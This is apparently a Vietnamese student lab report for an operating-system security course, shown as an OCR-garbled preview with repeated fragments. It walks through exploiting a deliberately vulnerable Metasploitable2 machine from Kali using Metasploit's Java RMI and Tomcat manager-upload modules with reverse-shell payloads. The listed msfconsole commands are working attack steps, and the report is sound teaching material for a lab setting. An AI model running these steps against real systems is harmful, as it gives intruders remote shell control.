BÁO cáo bài THỰC HÀNH số 02 AN TOÀN hệ điều HÀNH luyện thành thạo kỹ năng thực hành tấn công kiểm soát hệ thống chạy ubuntu từ xa sử dụng công cụ tấn công metasploit trên kali linux
Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống
1
/ 11 trang
THÔNG TIN TÀI LIỆU
Thông tin cơ bản
Định dạng
Số trang
11
Dung lượng
1,1 MB
Nội dung
HỌC VIỆN CƠNG NGHỆ BƯU CHÍNH VIỄN THƠNG KHOA CƠNG NGHỆ THƠNG TIN AN TỒN HỆ ĐIỀU HÀNH BÁO CÁO BÀI THỰC HÀNH SỐ 02 Giảng viên: Hoàng Xuân Dậu Họ tên : Nguyễn Minh Thành Mã sinh viên: B19DCAT177 Hà Nội – 2022 Page| An toàn HĐH (INT1484) - Bài thực hành số 1.Mục đích: - Tìm hiểu sâu lỗ hổng số dịch vụ, phần mềm HĐH - Luyện thành thạo kỹ thực hành cơng kiểm sốt hệ thống chạy Ubuntu từ xa sử dụng công cụ công Metasploit Kali Linux Tìm hiểu lỗ hổng bảo mật số DV Ubuntu Metasploitable2 máy ảo VMWare tích hợp nhiều dịch vụ chứa lỗi bảo mật biết cho phép khai thác kiểm soát hệ thống từ xa phục vụ học tập Danh sách lỗ hổng hướng dẫn khai thác tìm tại: https://www.hackingarticles.in/comprehensive-guide-on-metasploitable-2/ Bài thực hành tìm hiểu lỗ hổng bảo mật nguy hiểm số dịch vụ hệ điều hành cách khai thác: - Lỗ hổng sử dụng cấu hình ngầm định trong dịch vụ Java RMI chạy cổng 8080, cho phép khai thác kiểm soát hệ thống Đọc thêm https://www.infosecmatter.com/metasploit-module-library/? mm=exploit/multi/misc/java_rmi_server - Lỗ trong máy chủ web Apache Tomcat chạy cổng 8180 cho phép sử dụng tài khoản ngầm định sau nạp thực tải xa, cho phép khai thác kiểm soát hệ thống Đọc thêm https://www.infosecmatter.com/metasploit-modulelibrary/?mm=exploit/multi/http/tomcat_mgr_upload 3.Nội dung thực hành 3.1 Cài đặt công cụ, tảng - Cài đặt Kali Linux (nếu chưa cài đặt) máy ảo (hoặc máy thực) - Kiểm tra chạy thử công cụ công MetaSploit - Tải cài đặt Metasploitable2 làm máy victim: 3.2 Tìm địa máy victim Metasploitable2 Kali đảm bảo có kết nối o Tìm địa IP máy victim, kali: Chạy lệnh cửa sổ terminal: ifconfig eth0 o Tìm IP v4 interface eth0 mục ‘inet addr’ - Kiểm tra kết nối mạng máy: o Từ máy victim, chạy lệnh ping o Từ máy Kali, chạy lệnh ping 3.3 Khai thác lỗ hổng sử dụng cấu hình ngầm định trong dịch vụ Java RMI: - Khởi động Metasploit - Khai báo sử dụng mô đun công: msf> use exploit/multi/misc/java_rmi_server - Chọn payload cho thực thi (mở shell): msf > set payload java/shell/reverse_tcp - Đặt địa IP máy victim: msf > set RHOST - Thực thi công: msf > exploit Nếu thực thành công, hệ thống báo “Command shell session opened”, sau lại báo lỗi trở dấu nhắc bước trước - Kết nối trở lại phiên (session) tạo thành công: > sessions (thường session - số phải số session tạo trên) - Chạy lệnh phiên khai thác mở: - Gõ lệnh exit để kết thúc 3.4 Khai thác lỗi Apache Tomcat: - Khởi động Metasploit - Khai báo sử dụng mô đun công: msf > use exploit/multi/http/tomcat_mgr_upload - Đặt địa IP máy victim: msf > set RHOST - Đặt 8180 cổng truy cập máy victim: msf > set RPORT 8180 - Chọn payload cho thực thi (mở shell): msf > set payload java/shell/reverse_tcp - Thực thi công: - msf>exploit mở shell với người dùng tomcat55 cho phép chạy lệnh từ máy Kali thực lệnh shell máy victim - Chạy lệnh để đọc tên người dùng máy truy cập 4.Yêu cầu cần đạt Thành thạo cài đặt chạy máy ảo Ubuntu Thành thạo sử dụng Metasploit để công khai thác lỗ hổng sử dụng thư viện có sẵn Chụp ảnh hình kết lưu vào file (hoặc giữ nguyên cửa sổ hình thực hiện): a Màn hình khai thác lỗ hổng sử dụng cấu hình ngầm định trong dịch vụ Java RMI (tất bước kết cuối cùng) b Màn hình khai thác lỗ hổng Apache Tomcat (tất bước kết cuối cùng) .. .An toàn HĐH (INT1484) - Bài thực hành số 1.Mục đích: - Tìm hiểu sâu lỗ hổng số dịch vụ, phần mềm HĐH - Luyện thành thạo kỹ thực hành cơng kiểm sốt hệ thống chạy Ubuntu từ xa sử dụng công cụ. .. cần đạt Thành thạo cài đặt chạy máy ảo Ubuntu Thành thạo sử dụng Metasploit để công khai thác lỗ hổng sử dụng thư viện có sẵn Chụp ảnh hình kết lưu vào file (hoặc giữ nguyên cửa sổ hình thực hiện):... https://www.infosecmatter.com /metasploit- modulelibrary/?mm=exploit/multi/http/tomcat_mgr_upload 3.Nội dung thực hành 3.1 Cài đặt công cụ, tảng - Cài đặt Kali Linux (nếu chưa cài đặt) máy ảo (hoặc máy thực) - Kiểm tra chạy thử công cụ công MetaSploit - Tải cài đặt Metasploitable2 làm